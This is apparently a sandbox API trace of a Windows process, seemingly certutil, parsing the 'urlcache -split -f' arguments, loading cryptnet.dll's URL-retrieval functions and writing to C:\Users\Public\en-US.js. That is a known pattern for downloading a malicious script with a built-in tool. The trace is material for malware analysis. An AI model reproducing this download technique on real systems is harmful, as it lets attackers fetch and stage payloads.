[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dsDel", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dsPublish", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dsCert", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dsCRL", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dsDeltaCRL", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dsTemplate", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dsAddTemplate", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="ADTemplate", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="Template", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="TemplateCAs", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="CATemplates", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="SetCATemplates", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="SetCASites", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="enrollmentServerURL", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="ADCA", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="CA", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="Policy", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="PolicyCache", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="CredStore", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="InstallDefaultTemplates", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="URL", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="URLCache", cchCount2=-1) returned 2
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 3
[0041.999] lstrcmpW (lpString1="split", lpString2="uSAGE") returned -1
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="deny", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="resubmit", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="setattributes", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="setextension", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="revoke", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="isvalid", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="getconfig", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="getconfig2", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="getconfig3", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ping", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="pingadmin", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="CAInfo", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="CAPropInfo", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ca.cert", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ca.chain", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="GetCRL", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="CRL", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="shutdown", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="installCert", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="renewCert", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="schema", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="view", cchCount2=-1) returned 1
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="db", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="deleterow", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="backup", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="backupDB", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="backupKey", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="restore", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="restoreDB", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="restoreKey", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="exportPFX", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="importPFX", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dynamicfilelist", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="databaselocations", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="hashfile", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="store", cchCount2=-1) returned 1
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="enumstore", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="addstore", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="delstore", cchCount2=-1) returned 3
[0041.999] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="verifystore", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="repairstore", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="viewstore", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="viewdelstore", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="UI", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="TPMInfo", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="attest", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="getcert", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ds", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dsDel", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dsPublish", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dsCert", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dsCRL", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dsDeltaCRL", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dsTemplate", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="dsAddTemplate", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ADTemplate", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="Template", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="TemplateCAs", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="CATemplates", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="SetCATemplates", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="SetCASites", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="enrollmentServerURL", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ADCA", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="CA", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="Policy", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="PolicyCache", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="CredStore", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="InstallDefaultTemplates", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="URL", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="URLCache", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="pulse", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="MachineInfo", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="DCInfo", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="EntInfo", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="TCAInfo", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="SCInfo", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="SCDump", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="SCRoots", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="key", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="delkey", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="verifykeys", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="verify", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="verifyCTL", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="syncWithWU", cchCount2=-1) returned 1
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="generateSSTFromWU", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="generatePinRulesCTL", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="downloadOcsp", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="addEccCurve", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="deleteEccCurve", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="displayEccCurve", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="csplist", cchCount2=-1) returned 3
[0042.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="csptest", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="CNGConfig", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="sign", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="nullsign", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="vroot", cchCount2=-1) returned 1
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="vocsproot", cchCount2=-1) returned 1
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="addEnrollmentServer", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="deleteEnrollmentServer", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="addPolicyServer", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="deletePolicyServer", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="Class", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="7f", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="oid", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="error", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="getsmtpinfo", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="setsmtpinfo", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="getreg", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="setreg", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="delreg", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ImportKMS", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ImportCert", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="GetKey", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="RecoverKey", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="MergePFX", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ConvertEPF", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="?", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="f", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="idispatch", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="enterprise", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="user", cchCount2=-1) returned 1
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="service", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="GroupPolicy", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="ut", cchCount2=-1) returned 1
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="mt", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="nocr", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="nocrlf", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="Unicode", cchCount2=-1) returned 1
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="UnicodeText", cchCount2=-1) returned 1
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="gmt", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="seconds", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="silent", cchCount2=-1) returned 3
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="split", cchCount2=-1) returned 2
[0042.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1
[0042.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1
[0042.002] lstrcmpW (lpString1="f", lpString2="uSAGE") returned -1
[0042.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3
[0042.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3
[0042.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0042.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3
[0042.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 3
[0042.002] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x4d318f8ea0
[0042.002] GetComputerNameW (in: lpBuffer=0x4d318f8ea0, nSize=0x4d316bf170 | out: lpBuffer="LHNIWSJ", nSize=0x4d316bf170) returned 1
[0042.002] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x4d316bf140 | out: lpBuffer=0x0, nSize=0x4d316bf140) returned 0
[0042.002] GetLastError () returned 0xea
[0042.002] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x4d318efe80
[0042.002] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x4d318efe80, nSize=0x4d316bf140 | out: lpBuffer="LHnIwsj", nSize=0x4d316bf140) returned 1
[0042.002] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0
[0042.002] GetSystemDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0x14
[0042.002] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x4d318f8a70
[0042.002] GetSystemDirectoryW (in: lpBuffer=0x4d318f8a70, uSize=0x14 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0042.002] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\cryptnet.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb2dd00000
[0042.169] LocalFree (hMem=0x4d318f8a70) returned 0x0
[0042.169] GetProcAddress (hModule=0x7ffb2dd00000, lpProcName="I_CryptNetEnumUrlCacheEntry") returned 0x7ffb2dd1a7f0
[0042.169] GetProcAddress (hModule=0x7ffb2dd00000, lpProcName="CryptRetrieveObjectByUrlW") returned 0x7ffb2dd09ce0
[0042.169] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\en-US.js", cchCount1=-1, lpString2="delete", cchCount2=-1) returned 1
